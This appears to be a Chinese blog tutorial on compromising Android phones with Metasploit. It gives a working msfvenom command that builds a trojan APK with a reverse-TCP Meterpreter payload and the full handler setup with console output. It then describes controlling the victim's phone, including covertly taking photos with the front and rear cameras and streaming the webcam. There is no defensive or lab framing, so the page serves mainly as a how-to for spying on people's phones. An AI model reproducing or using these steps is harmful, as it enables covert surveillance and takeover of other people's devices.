Msf渗透安卓客户端

环境:kali Linux

开启msf: msfconsole

生成apk木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R > /root/test.apk

'''
root@kali:~# msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.1.192:55555
[
] Starting the payload handler...


command:
msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

show options

set LHOST 192.168.1.192#本机ip

set LPORT 55555#监听端口

exploit #开始利用接收会话

<pre>

我们可以在我们的MSF里看见有一个会话连接了

image

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

image
image

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

image

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

总结:
1.用msf生成apk木马
2.配置并开启监听接收会话

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容